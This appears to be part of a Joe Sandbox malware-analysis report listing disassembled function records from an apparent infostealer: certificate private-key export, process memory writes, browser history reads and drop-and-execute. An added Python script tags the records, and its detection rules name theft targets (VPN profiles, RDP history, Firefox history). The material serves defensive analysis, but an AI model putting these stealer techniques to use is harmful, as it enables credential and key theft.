                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
                                                                        • String ID: /.2x$7+D$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$ioyn
                                                                        • API String ID: 2161712720-1498425709
                                                                        • Opcode ID: a25e5b017786837144a5a0b04777f20777e85b9858ce6eb30a9eb0907d864ba2
                                                                        • Instruction ID: ca13be3653af024a19c85dea3222ef3f8b3d22f570f636c14ed9ce9937ebb881
                                                                        • Opcode Fuzzy Hash: a25e5b017786837144a5a0b04777f20777e85b9858ce6eb30a9eb0907d864ba2
                                                                        • Instruction Fuzzy Hash: 10E16C32B046518BE710EFA5E8447EEB3A1BB48798F804136EE4D27A68DF3CD159C790
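The API list of the record above is the profile of a certificate and private-key export routine: it acquires a certificate's private key, patches code in its own process (GetProcAddress followed by VirtualProtect pairs around a CryptExportKey call), locates another process through the service control manager (OpenSCManager, OpenService, QueryServiceStatusEx, OpenProcess) and writes into it, then exports via CryptExportKey/NCryptExportKey and packages the result with PFXExportCertStoreEx. An analyst working through many such records wants that reasoning automated. The Python below is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own logic: it parses the APIs bullets and the String ID line exactly as the report prints them and maps them to coarse behaviour tags. The CAPABILITY and STRING_MARKERS rule tables and the tag names are this example's own assumptions; SAMPLE_RECORD is the list from this record, copied from the report.

```python
"""Capability tagging for one Joe Sandbox function record.
Added example: not part of the Joe Sandbox report and not Joe Sandbox's own
logic. It parses the 'APIs' bullets and the 'String ID' line as the report
prints them and maps them to coarse behaviour tags. CAPABILITY and
STRING_MARKERS are this example's own assumptions about what is worth flagging;
SAMPLE_RECORD is copied from the report's record for the function at 00007FF7CB87325E.
"""
import re
from typing import Dict, List

# One API reference as printed, with or without an argument list and with an
# optional "Part of subcall function <addr>:" prefix, e.g.
#   • CryptExportKey.ADVAPI32(?,?,00000000), ref: 00007FF7CB873404
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# The String ID line carries the function's referenced strings joined by '$'.
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")

# Assumed rules: every listed API (A/W suffix stripped) must be referenced.
CAPABILITY: Dict[str, frozenset] = {
    "cert_private_key_export": frozenset({"CryptAcquireCertificatePrivateKey", "CryptExportKey"}),
    "cng_key_export": frozenset({"NCryptExportKey"}),
    "pfx_export": frozenset({"CertOpenStore", "PFXExportCertStoreEx"}),
    "in_process_code_patch": frozenset({"GetProcAddress", "VirtualProtect"}),
    "remote_process_write": frozenset({"OpenProcess", "ReadProcessMemory", "WriteProcessMemory"}),
    "service_process_lookup": frozenset({"OpenSCManager", "OpenService", "QueryServiceStatusEx"}),
}
# Assumed rules: any listed substring inside a referenced string sets the tag.
STRING_MARKERS: Dict[str, tuple] = {
    "capi_private_blob": ("CAPIPRIVATEBLOB",),
    "vpn_profile_harvest": ("FortiClient\\Sslvpn", "SSL-VPN NetExtender"),
    "rdp_history_harvest": ("Terminal Server Client\\Servers",),
    "firefox_history_harvest": ("places.sqlite",),
}

def canonical(api: str) -> str:
    """Drop the ANSI/Unicode suffix so OpenServiceA and OpenServiceW hit one rule."""
    if len(api) > 2 and api[-1] in "AW" and api[-2].islower():
        return api[:-1]
    return api

def parse_record(lines: List[str]) -> Dict[str, list]:
    """Split a record into API references and referenced strings; other lines are ignored."""
    refs, strings = [], []
    for line in lines:
        m = API_LINE.match(line)
        if m:
            refs.append({"api": m.group("api"), "module": m.group("module"),
                         "ref": m.group("ref").upper(), "subcall": (m.group("sub") or "").upper()})
            continue
        m = STRING_LINE.match(line)
        if m:
            strings.extend(s for s in m.group("ids").split("$") if s)
    return {"refs": refs, "strings": strings}

def tag_record(lines: List[str]) -> Dict[str, list]:
    """Return the parsed record plus the sorted behaviour tags it triggers."""
    rec = parse_record(lines)
    present = {canonical(r["api"]) for r in rec["refs"]}
    tags = {t for t, need in CAPABILITY.items() if need <= present}
    tags |= {t for t, marks in STRING_MARKERS.items()
             if any(mk in s for s in rec["strings"] for mk in marks)}
    rec["apis"], rec["tags"] = sorted(present), sorted(tags)
    return rec

# Sample input: the APIs bullets and String ID line of one record, copied from the report.
SAMPLE_RECORD = """\
• CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB87325E
• CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF7CB87328D
• CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB8732BB
  • Part of subcall function 00007FF7CB8736F0: CryptExportKey.ADVAPI32 ref: 00007FF7CB873744
  • Part of subcall function 00007FF7CB8736F0: CryptExportKey.ADVAPI32 ref: 00007FF7CB87379E
• LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873336
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873380
• VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB8733AC
• VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB8733DC
• CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB873404
• VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB87341C
• VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB87343F
• CryptAcquireContextA.ADVAPI32 ref: 00007FF7CB873459
• CryptImportKey.ADVAPI32 ref: 00007FF7CB87347E
• OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB8734B5
• OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873505
• QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873523
• OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873532
• ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB87355D
• ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB87357C
• WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB87359F
• NCryptExportKey.NCRYPT ref: 00007FF7CB873605
• CertOpenStore.CRYPT32 ref: 00007FF7CB873667
• CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF7CB873682
• CertSetCertificateContextProperty.CRYPT32 ref: 00007FF7CB87369E
• PFXExportCertStoreEx.CRYPT32 ref: 00007FF7CB8736BD
• PFXExportCertStoreEx.CRYPT32 ref: 00007FF7CB8736DF
• String ID: /.2x$7+D$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$ioyn
""".splitlines()

if __name__ == "__main__":
    print(tag_record(SAMPLE_RECORD)["tags"])
```

The rules are deliberately conjunctive on API sets rather than on single calls: VirtualProtect or OpenProcess alone occur in plenty of benign code, but GetProcAddress plus VirtualProtect next to a CryptExportKey call, or a service lookup that ends in WriteProcessMemory, is the combination worth a tag. The String ID rules cover the other records in this section (the FortiClient/NetExtender/Terminal Server Client registry paths and places.sqlite), so the same tagger can be run over every record of the report.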
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
                                                                        • String ID: =p"p$=p"p$>p9p
                                                                        • API String ID: 199669925-890668147
                                                                        • Opcode ID: a704e8ea3cc7e12d3e41ecaca187322a5b9e62bb98761d97aa9ec53c2d1b6b09
                                                                        • Instruction ID: 358411729c71c0eddec73b98770935befcb48ad99b693cfde3e431a4364d039e
                                                                        • Opcode Fuzzy Hash: a704e8ea3cc7e12d3e41ecaca187322a5b9e62bb98761d97aa9ec53c2d1b6b09
                                                                        • Instruction Fuzzy Hash: 3CA1E232A1839186EB10EF6AA4401A9B7E1FB89B98F940035FE4C53B68CF3DD455CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
                                                                        • String ID: *.default-release$APPDATA$\places.sqlite
                                                                        • API String ID: 4154822446-3438982840
                                                                        • Opcode ID: e65e7b83617ab43540fe00d47d34ac815f55c605aef4560ecc047bbf39011d3b
                                                                        • Instruction ID: d0455abd4ca1f3b2c438d13c69b174e5c8711d0fe7121ea749fce2bfe9d31196
                                                                        • Opcode Fuzzy Hash: e65e7b83617ab43540fe00d47d34ac815f55c605aef4560ecc047bbf39011d3b
                                                                        • Instruction Fuzzy Hash: E9319321A1899392EF10EF18E8401E8F3A1FB447A8FC05031FA5D475B8EF6DD659C7A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Card$CardsFreeListMemory$ChangeStatus
                                                                        • String ID: "_": ""$%02X
                                                                        • API String ID: 2879528921-1880646522
                                                                        • Opcode ID: 1469aa397842543e0f958f141cad293e1374c8fccdcf4b332ba7a061652e57d8
                                                                        • Instruction ID: f35bf232c224a2f11676fd25ae2f5a5ede517f2a1a3f17c3530aa1d5a82aa213
                                                                        • Opcode Fuzzy Hash: 1469aa397842543e0f958f141cad293e1374c8fccdcf4b332ba7a061652e57d8
                                                                        • Instruction Fuzzy Hash: 74D1B722B4862345EA40FF6998512FC93D59F85BE8BC45031FD1E676B6DF3CE1A183A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Process$AddressCurrentLibraryLoadProcWow64
                                                                        • String ID:
                                                                        • API String ID: 4035193891-0
                                                                        • Opcode ID: d9433cb4c0b0783edecceb738938e31f42c253bdf9f57a76c28b29cf26c91256
                                                                        • Instruction ID: 551938a3e6f3be06b21edcc0c957a23d368055908c3b374d9458540a9a5dfa40
                                                                        • Opcode Fuzzy Hash: d9433cb4c0b0783edecceb738938e31f42c253bdf9f57a76c28b29cf26c91256
                                                                        • Instruction Fuzzy Hash: 9421F262A193D283EE00AF28A40027AE7D0FB5D7A4F841235FA8C02B25DF2CC164CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CryptExport$HeapProcess
                                                                        • String ID:
                                                                        • API String ID: 532797600-0
                                                                        • Opcode ID: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                        • Instruction ID: c707df1013618d588ccd940d676f1afc6d3f245919360a996d1d9ed6d9d2612b
                                                                        • Opcode Fuzzy Hash: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                        • Instruction Fuzzy Hash: B721B732A1965292EB50EF19F44037AB3E0EBC4BA8F448130FA4D577A5DF3DD4918B50
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f22fdfa8e974821b920fadf0c5ef20db9c8c6688bbe70ef6b624c4c461a76b7c
                                                                        • Instruction ID: 9ebdea094f5af568808e995ec257f7a6796aaeb88f75f1daf12c894f68a3b08d
                                                                        • Opcode Fuzzy Hash: f22fdfa8e974821b920fadf0c5ef20db9c8c6688bbe70ef6b624c4c461a76b7c
                                                                        • Instruction Fuzzy Hash: 61614853A082E54AE701EE3D84512F96BD1EB1679CF841134FE89A7BA7DA3CD097C360
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6d01c7f7f70e755251e5213423192505223118269c658bfc9e31a8515983880f
                                                                        • Instruction ID: 4abf57650554da8b079c7e57425feee0d862d06e03ba05dd046897c02da99abb
                                                                        • Opcode Fuzzy Hash: 6d01c7f7f70e755251e5213423192505223118269c658bfc9e31a8515983880f
                                                                        • Instruction Fuzzy Hash: EE515547A082D14CEB129E3D80913ED6FA1EB253A8F854025FE99A7B47D63CD057C360
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
                                                                        • String ID:
                                                                        • API String ID: 2161876737-0
                                                                        • Opcode ID: fc837f05eaeaec11483a2d0ed697738c41b71f0394e06bed3ba4087a4e68e6b5
                                                                        • Instruction ID: cf252373969a17edfaa822b94be16872246bc04c2e7cb6503e0da1379f8aa3b6
                                                                        • Opcode Fuzzy Hash: fc837f05eaeaec11483a2d0ed697738c41b71f0394e06bed3ba4087a4e68e6b5
                                                                        • Instruction Fuzzy Hash: 8C31B221B0866283E720FF2AA858729A2D0BF89BF0F844234ED5D477B5DF3ED4558790
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                         • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
                                                                        • String ID: %08X.exe$open
                                                                        • API String ID: 2307396689-1771423410
                                                                        • Opcode ID: 5ca8c4d93bbcac26c49b5db9cd55d20708d169f99a7b767ef2df99b98dd97959
                                                                        • Instruction ID: c60ed29b11fb171a64b106f9c59609a265a8f91bc85519c714055a426341331a
                                                                        • Opcode Fuzzy Hash: 5ca8c4d93bbcac26c49b5db9cd55d20708d169f99a7b767ef2df99b98dd97959
                                                                        • Instruction Fuzzy Hash: 3C31D87264899197E720EF64E8847E9A361FB8879CFC04035EA4D46968CF7CC65CC750
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                         • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
                                                                        • String ID: Default$LOCALAPPDATA$\History
                                                                        • API String ID: 3980575106-3555721359
                                                                        • Opcode ID: 3e70a395a46a2af505291de9ab1fd73a1e68383478261f10fbcbd77587007c23
                                                                        • Instruction ID: 4a218ccb6b6c3a6c7839d29b80c70d988f030818fefd2f8792d73ffa2babedd3
                                                                        • Opcode Fuzzy Hash: 3e70a395a46a2af505291de9ab1fd73a1e68383478261f10fbcbd77587007c23
                                                                        • Instruction Fuzzy Hash: 6B514622D18F9583E751EF28D5012B873B0F798798F85A221EB8D53666EF34E6D8C340
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                         • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                        • String ID: http
                                                                        • API String ID: 948891078-2541227442
                                                                        • Opcode ID: fa2a4001140bfe5c7a6159744d5126d4965f0e2380b7f0228df080dfac48d025
                                                                        • Instruction ID: dceda2d87e78b5c5c51636636522a8b2d78dfa9d2fcf0312379a4c3af8ff27bb
                                                                        • Opcode Fuzzy Hash: fa2a4001140bfe5c7a6159744d5126d4965f0e2380b7f0228df080dfac48d025
                                                                        • Instruction Fuzzy Hash: 7A418532608A929AE710EF79E4447ADB7E0EB8479CF804135FA0D5AA64DF3DD594C390
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                         • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
                                                                        • String ID: exit
                                                                        • API String ID: 1626563136-1626635026
                                                                        • Opcode ID: 157560532fddbdd474931b5b94a5a6403812c246ff955327fdeda3b2fbfc7b7d
                                                                        • Instruction ID: 5f90b5292985537a2f98fe2e9fe5aee50d67c52b4e441a2ba8e8b912ef5b1709
                                                                        • Opcode Fuzzy Hash: 157560532fddbdd474931b5b94a5a6403812c246ff955327fdeda3b2fbfc7b7d
                                                                        • Instruction Fuzzy Hash: 79316621A0866291EB50FF39D494179A3E1FF84BA8FD41031F90E965B9DF2CD895C3A0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                         • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
                                                                        • String ID:
                                                                        • API String ID: 1750269033-0
                                                                        • Opcode ID: 24e8de18f55c2aa4b7ce6dc9423715127756d38879f1172464cba5bf6f043b18
                                                                        • Instruction ID: 4e6c28528e0a336229273ff423f24f8dad45a31ebe4ed53d2cc43d282badf1e3
                                                                        • Opcode Fuzzy Hash: 24e8de18f55c2aa4b7ce6dc9423715127756d38879f1172464cba5bf6f043b18
                                                                        • Instruction Fuzzy Hash: 5D615B36B44A1696EB10EF69D4503AC73A0FB49B9CF848032EE0D57B68DF39D559C3A0
                                                                        APIs
                                                                          • Part of subcall function 00007FF7CB8725DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CB871985,?,?,?,00007FF7CB87155F), ref: 00007FF7CB8725E5
                                                                        • __memcpy.DELAYIMP ref: 00007FF7CB87ED3F
                                                                          • Part of subcall function 00007FF7CB880110: __memcpy.DELAYIMP ref: 00007FF7CB880141
                                                                          • Part of subcall function 00007FF7CB880110: __memcpy.DELAYIMP ref: 00007FF7CB88014F
                                                                          • Part of subcall function 00007FF7CB87EB90: lstrlenA.KERNEL32 ref: 00007FF7CB87EBAD
                                                                          • Part of subcall function 00007FF7CB8725B4: GetProcessHeap.KERNEL32 ref: 00007FF7CB8725C1
                                                                          • Part of subcall function 00007FF7CB8725B4: HeapFree.KERNEL32 ref: 00007FF7CB8725CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                         • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                        • String ID: last_visit_time$table$url$urls
                                                                        • API String ID: 2336645791-3896411411
                                                                        • Opcode ID: 5917827d18d7574bbadcfaa1a2a35274c5974392dd144eb3ec1868595c081487
                                                                        • Instruction ID: 682ab36bfca38d6671ada07cb14a888b5d7637254467ba3f142966790924cfc9
                                                                        • Opcode Fuzzy Hash: 5917827d18d7574bbadcfaa1a2a35274c5974392dd144eb3ec1868595c081487
                                                                        • Instruction Fuzzy Hash: E231A91260869382DA60FF2EE4501AAA3D4FB407E8F804431FE5D57BA5EF3CD4A5C760
                                                                        APIs
                                                                          • Part of subcall function 00007FF7CB8725DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CB871985,?,?,?,00007FF7CB87155F), ref: 00007FF7CB8725E5
                                                                        • __memcpy.DELAYIMP ref: 00007FF7CB87EF5F
                                                                          • Part of subcall function 00007FF7CB880110: __memcpy.DELAYIMP ref: 00007FF7CB880141
                                                                          • Part of subcall function 00007FF7CB880110: __memcpy.DELAYIMP ref: 00007FF7CB88014F
                                                                          • Part of subcall function 00007FF7CB87EB90: lstrlenA.KERNEL32 ref: 00007FF7CB87EBAD
